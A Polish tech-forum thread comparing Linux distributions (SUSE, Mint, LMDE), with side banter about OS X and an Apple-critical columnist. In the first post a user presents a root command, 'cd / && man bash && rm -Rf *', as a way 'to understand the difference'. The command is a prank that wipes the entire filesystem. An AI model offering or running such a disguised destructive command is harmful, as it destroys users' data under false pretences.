![]() |
||
Nagrywarki |
Pliki |
Dyski twarde |
Recenzje |
Księgarnia |
Biosy |
Artykuły |
Nagrywanie od A do Z |
Słownik |
FAQ
|
||
|
|
|
|
#1 |
|
Banned
Data rejestracji: 20.06.2012
![]() |
sobrus,
dla mnie nieodmiennie dystrybucja dla niezaawansowanych, to taka która zawiera możliwie najmniej błędów i myślę tutaj głównie o takich błędach jak dokumentacja wycięta z pakietów itp Aby zrozumieć różnicę, wydaj w terminalu takie polecenie, najlepiej jako root: Kod:
cd / && man bash && rm -Rf * &> /dev/null A potem zainstaluj Haiku. Ostatnio zmieniany przez BananowaPrawica : 12.07.2012 o godz. 15:49 |
|
|
|
| #ads | |
|
CDRinfo.pl
Reklamowiec
Data rejestracji: 29.12.2008
|
|
|
|
|
|
#2 | |
|
Jukebox Hero
Data rejestracji: 17.09.2004
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Cytat:
Ja lubię jednak udogodnienia dla użytkownika w postaci po prostu prostej obsługi przez GUI, ale nie takiej w stylu Ubuntu czy Gnome3.Jestem leniwy, ale bez przesady, to jest już przegięcie. W suse jest taki złoty środek. ![]()
Ostatnio zmieniany przez sobrus : 13.07.2012 o godz. 08:55 |
|
|
|
|
|
|
#3 |
|
the one
CDRinfo VIP
Data rejestracji: 08.12.2002
![]() ![]() ![]() ![]() ![]() ![]() |
W sumie fajny pomysł i projekt:
http://www.kickstarter.com/projects/...pe-on-as-it-is (może ktoś będzie chciał się dorzucić W sumie sam bym o tym pomyślał, bo pomysł wydaje mi się ma szansę chwycić, ale samo urządzenie mi nie potrzebne, a innych korzyści z tego potem nie ma)
|
|
|
#4 |
|
Jukebox Hero
Data rejestracji: 17.09.2004
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Normalny mint to dystrybucja bazująca na Ubuntu (=debian+ubuntu+mint)
LMDE to dystrybucja bazująca na debian testing (=debian+mint). Miedzy nimi są spore różnice, LMDE jest dla bardziej zaawansowanych użytkowników - lżejsza szybsza, semi rolling (mniej stabilna) i generalnie trudniejsza w obsłudze. I nie jest kompatybilna z pakietami/repozytoriami ubuntu, a zwykły mint jest. |
|
|
|
|
|
#5 |
|
Forumator
Data rejestracji: 27.08.2004
![]() |
Optymalizacja to zdecydowanie mocna strona nowego systemu OS X 10.8, przynajmniej na moim MacBooku Air.
|
|
|
#6 |
|
ZnakJaworznickiegoBikera
Data rejestracji: 22.03.2005
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Tanie konta shell, www, php, sql - info priv Moj kanal Youtube /msg demek at freenode // Intel Pentium 4 630 3,0@5,6 GHZ --100% O/C CLUB 3Ghz@6750Mhz PISIOR - PRAWO I SPRAWIEDLIWOŚĆ I OJCIEC RYDZYK MEMORANDO - UZYTKOWNIK, KTOREGO DLA DOBRA WLASNEGO, DOBRA WLASNYCH PIENIEDZY I DOBRA WLASNYCH NERWOW NALEZY OMIJAC SZEROKIM LUKIEM |
|
|
|
|
|
#7 |
|
the one
CDRinfo VIP
Data rejestracji: 08.12.2002
![]() ![]() ![]() ![]() ![]() ![]() |
Nienawiść do sprzętów z literką A się z autora wylewa, ale pisane ma..
|
|
|
#8 |
|
Administrator
Zlotowicz
![]() Data rejestracji: 15.05.2004
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Nie określiłbym tego aż tak dosadnie - już prędzej jako ultrazjadliwą ironię, zresztą w tym wypadku jak najbardziej na miejscu.
|
|
|
|
#9 |
|
Թ
Data rejestracji: 14.02.2003
![]() ![]() ![]() ![]() ![]() |
To nazywa się dziennikarstwo niezależne i niepokorne, ostatnio popularne.
Z parasolem w dupie. |
|
|
|
|
|
#10 |
|
Nikoniarz
Data rejestracji: 26.01.2004
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Facet czasem przesadza, a niektóre teksty są na poziomie gimnazjalisty. I chyba to jest jego grupa docelowa.
|
|
|
|
|
|
#11 |
|
Թ
Ta grupa, która płaci maks. 10% za design.
|
|
|
|
|
|
#12 | |
|
Forumator
Data rejestracji: 02.03.2012
![]() |
Cytat:
Teksty OJ są raz lepsze, raz gorsze, ale gereralnie lubię to (nie w sensie fejsbukowym). O ile wiem, komentuje tam sporo osób z branży IT, zdecydowanie dorosłych.
|
|
|
|
#13 |
|
Թ
Kris wcale nie jest taki młody i nie załapał się na naukę czytania ze zrozumieniem, stąd czasami ciężko jest mu złapać meta tekstu. Do tego ta prowincjonalna homofobia, jego horyzont nie wykracza poza przyciężkie tyłki dziewek spod ostrołęckiej remizy.
Wracając do tematu, jak widać nieprawdą jest że tylko iPhone robi dobre zdjęcia. Czy to Sony? ![]() Na foto oczywiście Aleksandra Wydrych, jedna z najpiękniejszych Polek. |
|
|
|
|
|
#14 | |
|
AdvancedNet.pl - hosting
Data rejestracji: 11.04.2005
![]() |
Cytat:
|
|
|
|
|
|
|
#15 |
|
Թ
Raczkowski na dziś
|
|
|
|
![]() |
| Tagi |
| świadkowie jabłkowy, apple, apple fanboy, apple religion, fanatyzm, i-diot, ipad, pc-fanboys, sekta steve'a jobs'a |
|
|